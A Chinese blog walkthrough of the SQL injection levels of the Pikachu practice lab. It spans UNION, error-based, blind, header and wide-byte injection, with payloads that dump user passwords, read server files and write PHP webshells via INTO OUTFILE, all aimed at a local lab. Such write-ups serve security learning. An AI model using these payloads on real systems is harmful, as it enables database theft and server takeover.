皮卡丘SQL注入汇总

这篇具有很好参考价值的文章主要介绍了皮卡丘SQL注入汇总。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.Sql Inject(SQL注入)概述

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击

Sql 注入产生原因:

当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。
这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。

Sql 注入带来的威胁主要有如下几点:

猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。
绕过认证,列如绕过验证登录网站后台。
注入可以借助数据库的存储过程进行提权等操作

在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

2.数字型注入(post)

看题目,我们先选择查询id为1的用户

皮卡丘SQL注入汇总

我们查看上方url,发现没有传参,说明其实post类型

皮卡丘SQL注入汇总

这种时刻就该把bp请出来了,我们进行抓包

皮卡丘SQL注入汇总

果然是post传参,将其发送到Repeater

皮卡丘SQL注入汇总

找列数:id=1 order by n# &submit=%E6%9F%A5%E8%AF%A2,n为猜测的列数,如果猜测的列数大于select语句查询的结果的列数,会返回报错

比如,n为5时,就会报错。经过测试,列数为2

皮卡丘SQL注入汇总

爆库:id=1 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2

爆表:id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆列:id=1 union select group_concat(column_name),2 from information_schema.columns where  table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆数据:id=1 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2

读文件 :id=1 union select load_file('C:/Windows/win.ini'),1 from users#&submit=%E6%9F%A5%E8%AF%A2

写马:id=1 union select 1,'<?php assert($_POST[1]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/1.php'#&submit=%E6%9F%A5%E8%AF%A2

这里就不一一演示了嘿嘿

然后我们猜测sql语句为

select 字段1,字段2 from 表名 where id=1

我们再试试id=1 or 1=1&submit=%E6%9F%A5%E8%AF%A2,将其改为

select 字段1,字段2 from 表名 where id=1 or 1=1

上面其他语句也是同样的原理

在id=1后加上or 1=1试试

皮卡丘SQL注入汇总

由此将所有用户信息显示出来! 

3.字符型注入(get)

皮卡丘SQL注入汇总看题目,我们输入kobe 

皮卡丘SQL注入汇总

看上面url有显示,开始进行sql注入步骤:

查看源码,要用'来闭合

皮卡丘SQL注入汇总

找列数:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by n%23&submit=%E6%9F%A5%E8%AF%A2

n为猜测的列数,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径根据自己搭建皮卡丘时的路径而定

原理和上一关一样,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。

如,我们访问http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by 5%23&submit=%E6%9F%A5%E8%AF%A2,就会报错

皮卡丘SQL注入汇总

最终发现查询结果列数为2

爆库:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,database()%23&submit=%E6%9F%A5%E8%AF%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23&submit=%E6%9F%A5%E8%AF%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'%23&submit=%E6%9F%A5%E8%AF%A2

爆数据:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,load_file('C:/Windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,'<?php assert($_POST[2]); ?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/2.php'%23&submit=%E6%9F%A5%E8%AF%A2

这里还是不演示了,就是这么个道理!

我们同样猜测此sql语句为:

select 字段1,字段2 from 表名 where username = 'kobe';

同样将它改为(用一个单引号将前面的单引号闭合):

select 字段1,字段2 from 表名 where username = 'kobe' or 1=1#';

输入:kobe' or 1=1#试试

皮卡丘SQL注入汇总

同样将所有用户的信息显示出来!

4.搜索型注入

看题目说可以输入名字的一部分

皮卡丘SQL注入汇总

我们只输个“k”,网页返回所有带k的,且上面同样有url显示 

皮卡丘SQL注入汇总

所以一些sql注入语句(找列数、爆库、爆表啥的),还是老套路

查看源码,这次用%'来闭合 

皮卡丘SQL注入汇总

找列数:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' order by n%23&submit=%E6%90%9C%E7%B4%A2

n仍为猜测的列数,同样,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径还是根据自己搭建皮卡丘时的路径而定

本次发现查询结果列数为3

爆库:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select database(),2,3%23&submit=%E6%90%9C%E7%B4%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()%23&submit=%E6%90%9C%E7%B4%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'%23&submit=%E6%90%9C%E7%B4%A2

爆数据:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select username,password,level from users%23&submit=%E6%90%9C%E7%B4%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,load_file('C:/Windows/win.ini')%23&submit=%E6%90%9C%E7%B4%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,'<?php eval($_POST[3]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/3.php'%23&submit=%E6%90%9C%E7%B4%A2

这此猜测sql语句为:

select from 表名 where username like%k% ';

%代表没有或有多个字符,所以可对含有k的用户进行查询,我们再在改为(用%'来闭合):

select from 表名 where username like%k% ' or 1=1 #%';

输入k% ' or 1=1 #

皮卡丘SQL注入汇总

所有用户的信息显示出来!

5.xx型注入

老样子老样子,输入kobe,发现上面同样有url显示

皮卡丘SQL注入汇总

我们仍需考虑是什么闭合,查看源码发现相较于字符型注入,多了括号,所以这次用')来闭合

皮卡丘SQL注入汇总

找列数:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') order by n%23&submit=%E6%9F%A5%E8%AF%A2

n:猜测的列数,说了无数遍了嗷!

爆库:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select database(),2%23&submit=%E6%9F%A5%E8%AF%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(distinct table_name),2 from information_schema.columns where table_schema='pikachu'%23&submit=%E6%9F%A5%E8%AF%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(column_name),2 from information_schema.columns where table_name=0x7573657273%23&submit=%E6%9F%A5%E8%AF%A2

爆内容:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1, load_file('c:/windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1,'<?php assert($_POST[4]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/4.php'%23&submit=%E6%9F%A5%E8%AF%A2

我们再输入') or 1=1#,同样是用')来闭合

皮卡丘SQL注入汇总

所有用户信息!

6.insert/update注入

本关没有给出账号密码提示,我们点击注册

皮卡丘SQL注入汇总

填好信息后,用bp抓包。从抓包结果看是post型的,除了submit之外有6个参数。

皮卡丘SQL注入汇总

先是update注入,因为你得先注册才能修改信息吧

那就还得先了解一下updatexml()函数的用法:

语法:updatexml(xml document, XPathing, new_value)

第一个参数:XML_document是String格式,为XML文档对象的名称,也就是表中的字段名

第二个参数:XPath_string (Xpath格式的字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

那么怎么破解呢?跟上几关的思路不一样,本关是写一个报错注入,再报错回显时将我们想要得信息显示出来

回到注册界面,在用户栏写如下代码(注意闭合):

' or updatexml(1, concat(0x7e, database()), 0) or '

密码那些随便写,提交后得到以下界面

皮卡丘SQL注入汇总

看起来是个报错,其实已经回显了数据库名

同理可以把database()改为其他函数来获得更多数据库信息

insert注入

我们注册好一个用户666并登录

皮卡丘SQL注入汇总

点击修改个人信息,再在性别一栏输入刚才的代码:

' or updatexml(1, concat(0x7e, database()), 0) or '

皮卡丘SQL注入汇总

提交后同样得到了数据库名

皮卡丘SQL注入汇总

其他的爆表爆列啥的,就不写了哈

7.delete注入

随便输入一条留言666

皮卡丘SQL注入汇总

再点击删除,同时用bp抓包,发现其是GET传参

皮卡丘SQL注入汇总

send to repeater

之后在id=后输入如下代码将其闭合

1 or updatexml(1, concat(0x7e, database()), 0)

皮卡丘SQL注入汇总

再将此段代码转换为特殊字符的url编码

皮卡丘SQL注入汇总改完后就是这个样子

皮卡丘SQL注入汇总最后send,就得到了数据库名(和上题一样,还是以报错的形式)

皮卡丘SQL注入汇总

8."http header"注入

首先来了解一下什么是"http header"注入

有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证), 或者通过http header头信息获取客户端的一些资料,比如useragent、accept字段等,会对客户端的http header信息进行获取并使用SQL进行处理, 如果此时没有足够的安全考虑则可能会导致基于http header的SQL注入漏洞。

接下来看题目,按提示,我们用admin登录

皮卡丘SQL注入汇总

刷新一下并用bp抓包

皮卡丘SQL注入汇总

可以发现由上文提到的user agent 

send to Repeater后,再修改user agent ,如下

' or updatexml(1,concat(0x7e, database()), 0) or '

皮卡丘SQL注入汇总

最后send,成功得到数据库名(仍以报错的方式) 

9.盲注(base on boolian布尔类型)

首先了解下盲注的概念

(1)盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。

通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。

(2)盲注又分为布尔类型和时间类型

什么情况下使用布尔类型的盲注?

**没有返回SQL执行的错误信息

**错误与正确的输入,返回的结果只有两种

什么情况下使用时间类型的盲注?

**页面上没有显示位和SQL语句执行的错误信息,正确执行和错误执行的返回界面一样,此时需要使用时间类型的盲注。

时间型盲注与布尔型盲注的语句构造过程类似,通常在布尔型盲注表达式的基础上使用IF语句加入延时语句来构造,由于时间型盲注耗时较大,通常利用脚本工具来执行,在手工利用的过程中较少使用。

接下来看题,本题为布尔类型

皮卡丘SQL注入汇总

我们输入kobe' or 1=1#

皮卡丘SQL注入汇总

再试试kobe' or 1=2#

皮卡丘SQL注入汇总

可见,只有我们输入的条件为真时,才能输出正确信息

这次我们输入kobe' and length(database())=1#,显示您输入的username不存在.......

再把1换成2,以此类推,发现=7的时候,输出了正确信息

皮卡丘SQL注入汇总

那么,我们就知道了数据库长度为7,同理,更换其他函数来测试其他数据

10.盲注(based on time)

本题就是基于时间类型的盲注了,题目不告诉你了嘛

上面说了,此种类型适用于无论输入是否正确,都返回相同数据,我们无法判断自己输入的条件是否为真,所以在后面加了一个时间限制

先向上题那样,输入kobe' and length(database())=7#

皮卡丘SQL注入汇总

试试其他语句,我们发现 ,无论输入什么,回显的都是这句话

所以,我们这时就可以使用时间盲注了

输入kobe' and if(length(database())=7, sleep(1),5)#

意思为:若length(database())=7正确,延迟1秒返回:若不正确,延迟5秒返回

我们去测试,发现返回的虽然都是那句I don't care who you are!

但条件正确和不正确的回显时间不同,以此来判断哪个是正确条件

11.宽字节注入

还是先了解一下宽字节的原理

先了解一下什么是窄、宽字节已经常见宽字节编码:

**当某字符的大小为一个字节时,称其字符为窄字节.

**当某字符的大小为两个字节时,称其字符为宽字节.

**所有英文默认占一个字节,汉字占两个字节

**常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等

宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为’,其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。

接下来看题,我们随便输入一个用户123,用bp抓包发现其是post类型的

再send to Repeater

然后将name修改为如下代码(注意f后面有个单引号)

1%df' union select 1,2#

皮卡丘SQL注入汇总

最后send一下,成功得到我们想要的信息!

终于写完了啊啊啊啊!文章来源地址https://www.toymoban.com/news/detail-471144.html

到了这里,关于皮卡丘SQL注入汇总的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web安全 Pikachu(皮卡丘)靶场搭建.

    Pikachu(皮卡丘)是一个自带Web漏洞的应用系统,在这里包含了常见的web安全漏洞。如果你是一个想学习Web渗透测试人员,并且没有找到合适靶场,则可以使用这个Pikachu(皮卡丘)进行练习。( 靶场包含:(1)暴力破解,(2)XSS,(3)CSRF,(4)SQL注入,(5)RCE,(6)文件

    2023年04月17日
    浏览(39)
  • 教你用Python画哆啦A梦、海绵宝宝、皮卡丘、史迪仔!

       由于代码过长,这里仅显示部分代码:        部分代码如下:       部分代码如下:       部分代码如下:     关注我的原创公众号【 小鸿爱摸鱼 】,回复【可爱皮卡丘】、【哆啦A梦】、【史迪仔】、【海绵宝宝】获取对应的源码     Author:南柯树下,Goa

    2023年04月18日
    浏览(36)
  • 皮卡丘存储型xss、DOM型xss、DOM型xss-x

    看题目,我们先留言,看它的过滤机制 发现可以永久存储并输出我们的留言 之后插入payload: scriptalert(\\\'xss\\\')/script  成功弹窗! Dom型xss,简单的说,就是向文档对象传入xss参数,然后操作文档对象是触发xss攻击 先插入payload:scriptalert(1)/script试试 F12,发现a元素href属性的值改编

    2024年02月08日
    浏览(39)
  • 教你用Python画哆啦A梦、海绵宝宝、皮卡丘、史迪仔!(附完整源码)

       由于代码过长,这里仅显示部分代码:        部分代码如下:       部分代码如下:       部分代码如下:     关注我的原创公众号【 小鸿爱摸鱼 】,回复【可爱皮卡丘】、【哆啦A梦】、【史迪仔】、【海绵宝宝】获取对应的源码     Author:南柯树下,Goa

    2023年04月20日
    浏览(36)
  • 我让ChatGPT用CSS3画一个皮卡丘,还是自己画的可爱

    突然想到了小时候看过的动画片《皮卡丘》,于是突然就想,ChatGPT肯定也看过,他哪有不知道的东西啊,于是就想着让他帮我画一个,他画出来之后,我笑了,这啥玩意儿啊。   目录 一、第一次尝试让ChatGPT用CSS3画皮卡丘 1. 绘制皮卡丘的耳朵: 2. 绘制皮卡丘的眼睛: 3. 

    2024年02月04日
    浏览(45)
  • 【Python Turtle合集】有趣好玩的代码当然要分享给大家啦~(皮卡丘、玫瑰花、小黄人......)

    🚀 作者 :“程序员梨子” 🚀 **文章简介 **:本篇文章主要是写了利用Turtle库绘制四种不一样的图案的小程序! 🚀 **文章源码免费获取 : 为了感谢每一个关注我的小可爱💓每篇文章的项目源码都是无 偿分享滴💓👇👇👇👇 点这里蓝色这行字体自取,需要什么源码记得

    2023年04月13日
    浏览(52)
  • 其实python真的很简单!今天就教会你,用Python画哆啦A梦、海绵宝宝、皮卡丘、史迪仔!附上源码,不信你还学不会!

    由于代码过长,这里仅显示部分代码: 部分代码如下: 部分代码如下: 部分代码如下: —— —— —— —— — END —— —— —— —— ————

    2024年02月07日
    浏览(41)
  • SQL注入(1)--判断是否存在SQL注入漏洞

    不论是学习后端开发/数据库/网络安全,SQL注入安全隐患反复被提起 到底什么是SQL? 维基百科的定义: (1)什么是SQL? SQL是用来操控数据库的语言 (2)举一个例子,现在我们要查询电影“长津湖”的票房数据: 先想象一下开发人员是如何书写代码从数据库中拿到数据的:

    2024年02月05日
    浏览(45)
  • SQL注入的一些示例及解决SQL注入的方法

    SQL注入是一种常见的网络攻击手段,攻击者通过把SQL命令插入到Web表单提交或输入框后面,盗取数据库信息,甚至控制数据库服务器。解决SQL注入的方法如下: 1、使用参数化查询: 参数化查询是一种预编译查询,该查询将参数和SQL语句分开,从而允许程序将参数值与SQL语句

    2023年04月09日
    浏览(41)
  • SQL注入之WHERE 子句中的 SQL 注入漏洞

    ● 实验室要求 此实验室在产品类别筛选器中包含 SQL 注入漏洞。当用户选择类别时,应用程序将执行如下所示的 SQL 查询: 若要解决实验室问题,请执行 SQL 注入攻击,使应用程序显示任何类别(已发布和未发布)中所有产品的详细信息。 ● 必要知识点 一个没有安全概念的

    2024年02月14日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包